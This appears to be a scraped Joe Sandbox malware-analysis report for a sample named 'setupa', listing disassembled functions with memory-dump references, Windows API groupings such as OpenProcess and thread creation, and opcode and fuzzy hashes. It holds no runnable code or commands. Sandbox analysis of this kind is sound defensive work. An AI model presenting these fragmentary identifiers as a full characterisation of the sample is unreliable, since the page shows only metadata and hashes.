                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e0de1f533f0d522e1ee52b876cd52b26c956cbb957bf5cffaec9be16d4f4f5c9
                                                                                                              • Instruction ID: 16614a7b3b4563baf3cfde70ed4fe5a2f1418ef08c2dbb6050ddfb51bf54a289
                                                                                                              • Opcode Fuzzy Hash: e0de1f533f0d522e1ee52b876cd52b26c956cbb957bf5cffaec9be16d4f4f5c9
                                                                                                              • Instruction Fuzzy Hash: 45A18B63A08782C6FA618E7098503BA6691BF44FE6F9C4639DE6D867C5DF3CE444E340
                                                                                                              Function 00007FF689710E28 Relevance: 7.7, APIs: 5, Instructions: 223COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1849fb8246224c0562d57be9887867045d85da44354dc6fc0f83406d8c61ac05
                                                                                                              • Instruction ID: 47d4a28845b230aab6d709e8ae14de88dc9dbbb6dc09cf17c6a1cf1db50a08c2
                                                                                                              • Opcode Fuzzy Hash: 1849fb8246224c0562d57be9887867045d85da44354dc6fc0f83406d8c61ac05
                                                                                                              • Instruction Fuzzy Hash: 0F91D422F08642C6FA649F219461279A6A5FF42FE6F154239DE6E8B6D4DF3CD842D300
                                                                                                              Function 00007FF6897329A4 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                              • String ID:
                                                                                                              • API String ID: 3659116390-0
                                                                                                              • Opcode ID: f3b47c5b912e3f4e71813dd3e7deaa716c48953dbbc8e8a0e7e9734a54d15a5d
                                                                                                              • Instruction ID: 00785c211ac09c723b2213339fbe26841cad962d26c42e65b0779d11568c7df9
                                                                                                              • Opcode Fuzzy Hash: f3b47c5b912e3f4e71813dd3e7deaa716c48953dbbc8e8a0e7e9734a54d15a5d
                                                                                                              • Instruction Fuzzy Hash: 29516E32A14A92CAF710CF75E4443AD2BA0FB44B99F448139DE4E97A99EF38D146D700
                                                                                                              Function 00007FF6897249DC Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc
                                                                                                              • String ID:
                                                                                                              • API String ID: 190572456-0
                                                                                                              • Opcode ID: 3e05fff8e21687def1374a662557877356c58e1e453b3372514b144f9b3abeea
                                                                                                              • Instruction ID: 7986c396e1e451936fe7df4c9c34e9c2d66464204f31cf8d5fdf67cd1c77ab6a
                                                                                                              • Opcode Fuzzy Hash: 3e05fff8e21687def1374a662557877356c58e1e453b3372514b144f9b3abeea
                                                                                                              • Instruction Fuzzy Hash: 9B41B021B29602C1FA159F86A88567A62A1BF48FD2F09453DDD2FCB784EE3CE441C304
                                                                                                              Function 00007FF689643A08 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: List$Interlocked$DepthEntryPushQuery$Flush
                                                                                                              • String ID:
                                                                                                              • API String ID: 358188281-0
                                                                                                              • Opcode ID: 66ac247cbe1d0099658d73aed0862cb96b3719d871f8e55e01e92a7e858667aa
                                                                                                              • Instruction ID: 8584711e50c4fbc7f088741cc3497ece6d17f06aa84d1c68b3057e402b3b01c5
                                                                                                              • Opcode Fuzzy Hash: 66ac247cbe1d0099658d73aed0862cb96b3719d871f8e55e01e92a7e858667aa
                                                                                                              • Instruction Fuzzy Hash: 72416C32A18A51C6EB14DF25E5501BD37B0FF49F8AB510139EA4E83B58EF38E994E740
                                                                                                              Function 00007FF6896435B7 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: List$Interlocked$DepthEntryPushQuery$Flush
                                                                                                              • String ID:
                                                                                                              • API String ID: 358188281-0
                                                                                                              • Opcode ID: a6dca042b08bc734442d46a4a34d4c280bf8817fa64ad2d32edf740ba09ec30d
                                                                                                              • Instruction ID: 802ffdf7867220f9a94a1917758f77bd7caf7fed9a2fb5bacf11c42cc401209c
                                                                                                              • Opcode Fuzzy Hash: a6dca042b08bc734442d46a4a34d4c280bf8817fa64ad2d32edf740ba09ec30d
                                                                                                              • Instruction Fuzzy Hash: A9415D72608A41C6EF15DF26E5501BD37A0FF89F8AB14013AEE4E93A54DF38EA85D740
                                                                                                              Function 00007FF68964592A Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: List$Interlocked$DepthEntryPushQuery$Flush
                                                                                                              • String ID:
                                                                                                              • API String ID: 358188281-0
                                                                                                              • Opcode ID: 9c4fe89fdfe404a64806ebc5534dea8e97b6eb1dc6672fcb6d214a2a4216e5c1
                                                                                                              • Instruction ID: aa43f89aceae6f5b548855803fda488b2d453571c287df59dfb8543c73971604
                                                                                                              • Opcode Fuzzy Hash: 9c4fe89fdfe404a64806ebc5534dea8e97b6eb1dc6672fcb6d214a2a4216e5c1
                                                                                                              • Instruction Fuzzy Hash: 88418C32608A45C6EB11DF21E5505BD37A0FF4AF8AB40003AEE5E93798DF38E985D780
                                                                                                              Function 00007FF689714844 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExitThread$CloseFreeHandleLibrary
                                                                                                              • String ID:
                                                                                                              • API String ID: 2705336791-0
                                                                                                              • Opcode ID: 13ec1ad90aadc8c557f13098c17bc3fbde9c7d7a473fe7182bc2e3ea4c844adc
                                                                                                              • Instruction ID: 387418ccf742d4c58bbc228d1df4606dd115bfd8ee6c66ff44bf2ddb9a62195b
                                                                                                              • Opcode Fuzzy Hash: 13ec1ad90aadc8c557f13098c17bc3fbde9c7d7a473fe7182bc2e3ea4c844adc
                                                                                                              • Instruction Fuzzy Hash: CD010021A08686D2FB149F60A59417C22A4BF45FF6F14073DC22D826E5DF78E454C344
                                                                                                              Function 00007FF68964677B Relevance: 7.6, APIs: 5, Instructions: 57threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume
                                                                                                              • String ID:
                                                                                                              • API String ID: 3954663864-0
                                                                                                              • Opcode ID: 05c939b51d5535321289230bed4abcce831a3e8461ac90e5580470fde0f9a77a
                                                                                                              • Instruction ID: eedf5a2a1d65bc6e043482a7395d852722dbc678a4925ac2f94e992e3c84d0cf
                                                                                                              • Opcode Fuzzy Hash: 05c939b51d5535321289230bed4abcce831a3e8461ac90e5580470fde0f9a77a
                                                                                                              • Instruction Fuzzy Hash: 4B219D21A09702C6FE249F60A4652B962A0BF46FF6F05073DDA3E827D0EF3CE454C604
                                                                                                              Function 00007FF689733048 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                              • String ID: U
                                                                                                              • API String ID: 2456169464-4171548499
                                                                                                              • Opcode ID: 0a39034b221bca4d61d213e01ba932a6e51a446181c4a256a89e61f419f66193
                                                                                                              • Instruction ID: 41458793af8aaaace1c712b6c1a8bf7a56d9e521e5f0006600e657c2349d5b6a
                                                                                                              • Opcode Fuzzy Hash: 0a39034b221bca4d61d213e01ba932a6e51a446181c4a256a89e61f419f66193
                                                                                                              • Instruction Fuzzy Hash: BE41A222B19A41D2EB208F25E8443AA77A1FB88BD5F854039EE4E87788DF3CD441CB40
                                                                                                              Function 00007FF68964270C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: OpenProcess
                                                                                                              • String ID: Open$Proc$ess
                                                                                                              • API String ID: 3743895883-633399097
                                                                                                              • Opcode ID: fd97c17850388e9c3ff76e8b3c1c27f857b0c40d4cce75d02240dd44613da4fc
                                                                                                              • Instruction ID: 69d6317c55443016b35751f1b3aaab0b916f3676b647b1f17ac4f2d1b8509a9c
                                                                                                              • Opcode Fuzzy Hash: fd97c17850388e9c3ff76e8b3c1c27f857b0c40d4cce75d02240dd44613da4fc
                                                                                                              • Instruction Fuzzy Hash: B2119E32B1575086F710CF62A8141A967A5BB88FE4F484039EE0D57B49DF38D592CB40
                                                                                                              Function 00007FF6896442AF Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
